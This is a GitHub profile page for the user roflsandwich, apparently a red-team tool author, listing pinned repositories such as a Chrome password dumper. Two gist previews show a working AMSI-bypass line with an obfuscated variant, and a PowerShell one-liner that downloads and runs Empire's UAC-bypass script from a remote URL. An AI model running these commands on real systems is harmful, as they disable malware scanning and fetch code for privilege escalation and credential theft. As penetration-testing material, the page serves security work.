8000 roflsandwich · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
View roflsandwich's full-sized avatar

Block or report roflsandwich

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. Chrome-Password-Dumper Chrome-Password-Dumper Public

    PowerShell 147 20

  2. Steam-EoP Steam-EoP Public

    PowerShell 33 5

  3. rofltools rofltools Public

    PowerShell

  4. Tapo_L530E Tapo_L530E Public

    Powershell script to turn on/off tp-link L530E smart lamp

    PowerShell 7 2

  5. Invoke-OneShot-Mimikatz.ps1 - One Sh... Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
    1
    #Obfuscate the AMSI bypass
    2
    #Powershell ISE > Start-Steroids
    3
    [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
    4
    #If Obfuscation is not working with steroids, split all string!
    5
    [Ref].Assembly.GetType('System.Management.Automation.Am'+'siU'+'tils').GetField('am'+'siIn'+'itFai'+'led','NonPublic,Static').SetValue($null,$true)
  6. RedTeam_CheatSheet.ps1 RedTeam_CheatSheet.ps1
    1
    # Description: 
    2
    #    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
    3
    
                  
    4
    # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    5
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
0